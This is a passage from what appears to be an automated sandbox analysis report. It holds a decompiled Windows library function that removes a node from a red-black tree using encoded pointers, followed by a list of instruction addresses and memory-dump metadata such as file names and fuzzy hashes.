												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}

0x1e3af90b
0x1e3af911
0x1e3af917
0x1e3af919
0x1e3af91c
0x1e405d63
0x1e405d69
0x1e405d69
0x1e405d63
0x1e3af922
0x1e3af927
0x1e405d72
0x1e405d78
0x1e405d78
0x1e405d72
0x1e3af92d
0x1e3af931
0x1e3afa2d
0x1e3afa2d
0x1e3af939
0x1e3af940
0x1e3af944
0x1e3afa37
0x1e3afa39
0x1e3afa3c
0x1e3afa3e
0x1e3afa41
0x1e3afa48
0x1e3afe68
0x1e3afe6c
0x1e3afe6c
0x1e3afe78
0x1e3afe78
0x1e3afe7a
0x1e3afe7a
0x1e3afe7e
0x1e3afe6e
0x1e3afe6e
0x1e3afe72
0x00000000
0x00000000
0x00000000
0x1e3afe80
0x1e3afe80
0x1e3afe83
0x00000000
0x1e3afe83
0x1e405d7f
0x1e405d81
0x00000000
0x00000000
0x1e405d87
0x00000000
0x1e405d87
0x1e3afa4e
0x1e3afa50
0x1e405d90
0x00000000
0x00000000
0x1e405d98
0x1e3afa58
0x1e3afa58
0x1e3afa5d
0x1e3afa60
0x1e3afa63
0x1e3afa69
0x1e3afa6b
0x1e3afa6e
0x1e3afa71
0x1e405da1
0x1e405da7
0x1e405da7
0x1e405da1
0x1e3afa79
0x1e3b0071
0x1e3b0073
0x1e3b0074
0x00000000
0x1e3afa7f
0x1e3afa83
0x1e3afa85
0x1e405dae
0x1e405dae
0x1e3afa8b
0x1e3afa8f
0x1e3afa98
0x1e3afaa1
0x1e3afaa4
0x1e3afaa6
0x1e3afaa9
0x1e3afaac
0x1e405db7
0x1e405dbd
0x1e405dbd
0x1e405db7
0x1e3afab4
0x00000000
0x1e3afaba
0x1e3afabc
0x1e3afac2
0x1e3afac5
0x1e3afac7
0x1e3afac7
0x1e3afad6
0x1e3afad9
0x1e3afadf
0x1e3afae2
0x1e3afae4
0x1e3afae7
0x1e3afaea
0x1e3afaed
0x1e405dc4
0x1e405dc9
0x00000000
0x00000000
0x1e405dcf
0x1e3afaf6
0x1e3afafa
0x1e3afafc
0x1e3afafc
0x1e3afafe
0x1e3afb01
0x1e3afb09
0x1e3afb0c
0x1e3afb12
0x1e3afb14
0x1e3afb17
0x1e405dd6
0x1e405dd9
0x1e405dde
0x00000000
0x00000000
0x1e405de4
0x1e405de7
0x1e3afb29
0x1e3afb2c
0x1e405df3
0x1e405df6
0x1e405e06
0x1e405e0c
0x1e405e0f
0x1e405e11
0x00000000
0x1e405e1f
0x00000000
0x1e405e1f
0x1e405e11
0x1e405df8
0x1e405dfb
0x1e405e00
0x00000000
0x00000000
0x1e405e02
0x00000000
0x1e405e02
0x1e3afb32
0x1e3afb35
0x1e3afb3c
0x1e405e26
0x1e405e28
0x1e405e28
0x1e405e2e
0x1e405e3c
0x1e405e3c
0x1e405e2e
0x1e3afb45
0x1e3afb47
0x1e3afb53
0x1e3afb56
0x1e3afb59
0x1e3afb5c
0x1e3afb65
0x1e3b000d
0x00000000
0x1e3b000f
0x1e3b000f
0x00000000
0x1e3b000f
0x1e3afb6b
0x1e3afb6e
0x1e3afb71
0x1e3afb73
0x1e3afb76
0x1e405e45
0x1e405e4b
0x1e405e4b
0x1e405e45
0x1e3afb80
0x1e3afb83
0x1e405e54
0x1e405e5a
0x1e405e5a
0x1e405e54
0x1e3afb89
0x1e3afb98
0x1e3afb9b
0x1e3afb9e
0x1e3afba0
0x1e405e63
0x1e405e69
0x1e405e69
0x1e405e63
0x1e3afba8
0x00000000
0x1e3afbae
0x1e3afbb2
0x1e405e70
0x1e3afbb8
0x1e3afbb8
0x1e3afbb8
0x1e3afbbd
0x1e3afbbf
0x1e3afbbf
0x1e3af9a8
0x1e3af9a8
0x1e3af9ad
0x1e3af9b4
0x1e405eda
0x00000000
0x00000000
0x1e405ee2
0x1e3af9bc
0x1e3af9bc
0x1e3af9bf
0x1e3af9c4
0x1e3afde6
0x1e3afde9
0x1e3afdec
0x1e3afdef
0x1e3afdf2
0x1e405eeb
0x1e405ef1
0x1e405ef1
0x1e405eeb
0x1e3afdfa
0x00000000
0x1e3afe00
0x1e3afe04
0x1e405efa
0x1e405f00
0x1e405f00
0x1e405efa
0x1e3afe0a
0x1e3afa24
0x1e3afa2a
0x1e3afa2a
0x1e3afdfa
0x1e3af9cd
0x00000000
0x1e3af9cf
0x1e3af9cf
0x1e3af9d1
0x1e3af9d4
0x1e3af9d7
0x1e3af9d9
0x1e3af9dc
0x1e3af9df
0x1e3af9e2
0x1e3af9e7
0x1e405f09
0x00000000
0x00000000
0x1e405f11
0x1e3af9ef
0x1e3af9f3
0x1e3afed5
0x1e3afed8
0x1e3afedb
0x1e405f1a
0x1e405f20
0x1e405f20
0x1e405f1a
0x1e3afee3
0x00000000
0x1e3afee9
0x1e3afeeb
0x1e405f29
0x1e405f2f
0x1e405f2f
0x1e405f29
0x1e3afef3
0x00000000
0x1e3afef9
0x1e3afefc
0x1e3aff01
0x1e405f38
0x1e3b0052
0x1e3b0054
0x00000000
0x1e3b0056
0x1e3b0056
0x1e3aff40
0x1e3aff42
0x1e405f6e
0x1e405f74
0x1e405f74
0x1e405f6e
0x1e3aff50
0x1e3aff56
0x1e3aff5b
0x1e405f7d
0x00000000
0x00000000
0x1e405f83
0x00000000
0x1e3aff61
0x1e3aff61
0x1e3aff63
0x1e3b0021
0x1e3b0026
0x1e3b002b
0x1e3b007e
0x1e3b0080
0x1e3b0080
0x1e3b007e
0x1e3b002f
0x00000000
0x1e3b0031
0x1e3b0033
0x1e3b0086
0x1e3b0035
0x1e3b0035
0x1e3b0035
0x1e3b003c
0x00000000
0x1e3b003c
0x1e3b002f
0x1e3aff69
0x1e3aff6b
0x1e405f8c
0x1e405f92
0x1e405f92
0x1e405f8c
0x1e3aff74
0x1e3aff77
0x1e3aff7b
0x1e405f99
0x1e405f9b
0x1e3aff81
0x1e3aff81
0x1e3aff83
0x1e3aff83
0x1e3aff88
0x1e3aff8b
0x1e3aff90
0x1e3aff92
0x1e3aff92
0x1e3aff9c
0x1e3affa2
0x1e3affa6
0x1e3affaa
0x1e3affad
0x1e3affb2
0x1e405fa4
0x1e405faa
0x1e405faa
0x1e405fa4
0x1e3affb8
0x00000000
0x1e3affb8
0x1e3aff5b
0x1e3b0054
0x1e405f3e
0x1e405f3e
0x1e3aff09
0x00000000
0x00000000
0x1e3aff0f
0x1e3aff14
0x1e405f47
0x1e405f4d
0x1e405f4d
0x1e405f47
0x1e3aff1c
0x1e3b0046
0x1e3b0076
0x1e3b0078
0x00000000
0x1e3b0048
0x1e3b0048
0x1e3b004a
0x1e3b004a
0x00000000
0x1e3b004a
0x1e3aff22
0x1e3aff22
0x1e3aff26
0x1e405f56
0x1e405f5c
0x1e405f5c
0x1e405f56
0x1e3aff2e
0x00000000
0x1e3aff34
0x1e3aff36
0x1e405f65
0x1e3aff3c
0x1e3aff3c
0x1e3aff3c
0x1e3aff3e
0x00000000
0x1e3aff3e
0x1e3aff2e
0x1e3aff1c
0x1e3afef3
0x1e3afee3
0x1e3af9f9
0x1e3af9f9
0x1e3af9fb
0x1e3af9ff
0x1e3afbd5
0x1e405fb1
0x1e405fb1
0x1e3afbdf
0x00000000
0x1e3afbe5
0x1e3afbe5
0x1e3afbe8
0x1e3afbed
0x1e405fdf
0x1e3afc01
0x1e3afc01
0x1e3afc04
0x1e3afc09
0x1e405fee
0x1e405ff4
0x1e405ff4
0x1e405fee
0x1e3afc0f
0x1e3afc13
0x1e3afc1d
0x1e3afc20
0x1e3afc23
0x1e3afc26
0x1e3afc2b
0x1e405ffd
0x1e406003
0x1e406003
0x1e405ffd
0x1e3afc33
0x00000000
0x1e3afc39
0x1e3afc3b
0x1e3afc3e
0x1e3afc41
0x1e3afc46
0x1e40600c
0x1e406012
0x1e406012
0x1e40600c
0x1e3afc4e
0x00000000
0x1e3afc54
0x1e3afc54
0x1e3afc59
0x1e40601b
0x1e406021
0x1e406021
0x1e40601b
0x1e3afc61
0x00000000
0x1e3afc67
0x1e3afc6a
0x1e3afc6f
0x1e40602a
0x1e406030
0x1e406030
0x1e40602a
0x1e3afc77
0x00000000
0x1e3afc7d
0x1e3afc7f
0x1e3afc81
0x1e3afc85
0x1e3afc87
0x1e3afc87
0x1e3afc8c
0x1e3afc8f
0x1e3afc94
0x1e406039
0x1e3afc9c
0x1e3afca4
0x1e3afcaa
0x1e3afcaf
0x1e406046
0x1e3afcbd
0x1e3afcbf
0x1e40606d
0x1e406073
0x1e406073
0x1e40606d
0x1e3afcc8
0x1e3afccd
0x1e3afccf
0x1e3afcd3
0x1e3afcd5
0x1e3afcd5
0x1e3afcde
0x1e3afce1
0x1e3afce3
0x1e3afce3
0x1e3afce8
0x1e3afcf0
0x1e3afcf2
0x1e3afcf5
0x1e3afcf7
0x1e3afcff
0x1e3afd02
0x1e3afd06
0x1e3afd11
0x1e3afd14
0x1e3afd17
0x1e40607c
0x1e406082
0x1e406082
0x1e40607c
0x1e3afd1f
0x00000000
0x1e3afd25
0x1e3afd28
0x1e3afd2d
0x1e40608b
0x1e406091
0x1e406091
0x1e40608b
0x1e3afd35
0x00000000
0x1e3afd3b
0x1e3afd3e
0x1e3afd43
0x1e40609a
0x1e3b0016
0x1e3b0018
0x00000000
0x1e3b001a
0x1e3b001a
0x1e3afd82
0x1e3afd84
0x1e4060d9
0x1e4060df
0x1e4060df
0x1e4060d9
0x1e3afd8d
0x1e3afd95
0x1e3afd98
0x1e3afd9d
0x1e4060e8
0x00000000
0x00000000
0x1e4060ee
0x00000000
0x1e3afda3
0x1e3afda3
0x1e3afda5
0x1e3afe8b
0x1e3afe90
0x1e3afe95
0x1e4060f7
0x1e4060fd
0x1e4060fd
0x1e4060f7
0x1e3afe9d
0x00000000
0x1e3afea3
0x1e3afea5
0x1e406106
0x1e3afeab
0x1e3afeab
0x1e3afeab
0x1e3afeb2
0x1e3afeb5
0x00000000
0x1e3afeb5
0x1e3afe9d
0x1e3afdab
0x1e3afdad
0x1e40610f
0x1e406115
0x1e406115
0x1e40610f
0x1e3afdb6
0x1e3afdbb
0x1e40611e
0x1e406120
0x1e3afdc1
0x1e3afdc1
0x1e3afdc5
0x1e3afdc5
0x1e3afdc7
0x1e3afdcc
0x1e3afdce
0x1e3afdce
0x1e3afdd6
0x1e3afdd8
0x00000000
0x1e3afdd8
0x1e3afd9d
0x1e3b0018
0x1e4060a0
0x1e4060a0
0x1e3afd4b
0x00000000
0x00000000
0x1e3afd51
0x1e3afd56
0x1e4060a9
0x1e4060af
0x1e4060af
0x1e4060a9
0x1e3afd5e
0x1e3afebf
0x1e4060b8
0x1e3afec5
0x1e3afec5
0x1e3afec5
0x1e3afec7
0x00000000
0x1e3afd64
0x1e3afd64
0x1e3afd68
0x1e4060c1
0x1e4060c7
0x1e4060c7
0x1e4060c1
0x1e3afd70
0x00000000
0x1e3afd76
0x1e3afd78
0x1e4060d0
0x1e3afd7e
0x1e3afd7e
0x1e3afd7e
0x1e3afd80
0x00000000
0x1e3afd80
0x1e3afd70
0x1e3afd5e
0x1e3afd35
0x1e3afd1f
0x1e40604c
0x1e40604c
0x1e3afcb7
0x1e3affc0
0x1e3affc3
0x1e3affc6
0x1e3affcb
0x1e406055
0x1e40605b
0x1e40605b
0x1e406055
0x1e3affd3
0x00000000
0x1e3affd9
0x1e3affdb
0x1e406064
0x1e3affe1
0x1e3affe1
0x1e3affe1
0x1e3affe3
0x1e3affe7
0x1e3affed
0x00000000
0x1e3affed
0x1e3affd3
0x00000000
0x1e3afcb7
0x1e40603f
0x1e3afc9a
0x00000000
0x1e3afc9a
0x1e3afc77
0x1e3afc61
0x1e3afc4e
0x1e3afc33
0x1e405fe5
0x1e405fe5
0x1e3afbf5
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3afbf5
0x1e3afbdf
0x1e3afa05
0x1e3afa05
0x1e3afa0a
0x1e3afe14
0x1e405fb8
0x1e405fb8
0x1e3afe1e
0x00000000
0x1e3afe24
0x00000000
0x1e3afe24
0x1e3afe1e
0x1e3afa10
0x1e3afa10
0x1e3afa15
0x1e3afe29
0x1e3afe2d
0x1e3afe35
0x1e3afe38
0x1e3afe3b
0x1e405fc1
0x00000000
0x00000000
0x1e405fc7
0x1e3afe43
0x1e3afe45
0x00000000
0x00000000
0x1e3afe4b
0x1e3afe50
0x1e405fd0
0x1e405fd6
0x1e405fd6
0x1e405fd0
0x1e3afe5d
0x1e3afe60
0x00000000
0x1e3afe60
0x1e3afe41
0x1e3afe41
0x00000000
0x1e3afa1b
0x1e3afa1b
0x1e3afa1d
0x1e3afa20
0x00000000
0x1e3afa20
0x1e3afa15
0x1e3af9ed
0x1e3af9ed
0x00000000
0x1e3af9ed
0x1e3af9cd
0x1e3af9ba
0x1e3af9ba
0x00000000
0x1e3af9ba
0x1e3afba8
0x1e3afb65
0x1e3afb1d
0x1e3afb23
0x1e3afb26
0x00000000
0x1e3afb26
0x1e3afaf3
0x1e3afaf3
0x00000000
0x1e3afaf3
0x1e3afab4
0x1e3afa79
0x1e3afa56
0x1e3afa56
0x00000000
0x1e3afa56
0x1e3af94d
0x1e3af950
0x1e3af955
0x1e405e79
0x1e405e7f
0x1e405e7f
0x1e405e79
0x1e3af95b
0x1e3af960
0x1e405e88
0x1e405e8a
0x1e405e8a
0x1e405e8e
0x1e405e93
0x00000000
0x1e405e99
0x1e405e9c
0x1e405e9f
0x1e405ea1
0x1e405ea3
0x1e405ea3
0x1e405ea7
0x00000000
0x1e405ea7
0x1e3af966
0x1e3af966
0x1e3af96b
0x1e405eb0
0x1e405eb6
0x1e405eb6
0x1e405eb0
0x1e3af973
0x1e3afbc7
0x1e3af9a5
0x1e3af9a5
0x00000000
0x1e3af979
0x1e3af97d
0x1e3af97f
0x1e405ebf
0x1e405ec5
0x1e405ec5
0x1e405ebf
0x1e3af987
0x00000000
0x1e3af98d
0x1e3af98d
0x1e3af990
0x1e3af994
0x1e3af997
0x1e3af99f
0x1e3afff7
0x1e3b0061
0x1e3b0064
0x1e3b006a
0x1e405ece
0x1e405ed0
0x1e405ed0
0x00000000
0x1e3b0064
0x1e3afffd
0x1e3b0000
0x00000000
0x1e3b0006
0x1e405ecc
0x00000000
0x1e405ecc
0x1e3b0000
0x00000000
0x1e3af99f
0x1e3af987
0x1e3af973

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction ID: 8b77b0b3f4dffe1095aa4dcea0b2e9cf76e7309d44d1d1d9d5345bbc224d576f
Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction Fuzzy Hash: 3F62B331E146929BCB22CE25C45029AFBA7EF85354F2983A9CD94DB389D375D9C1CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C6E30, Relevance: .5, Instructions: 481
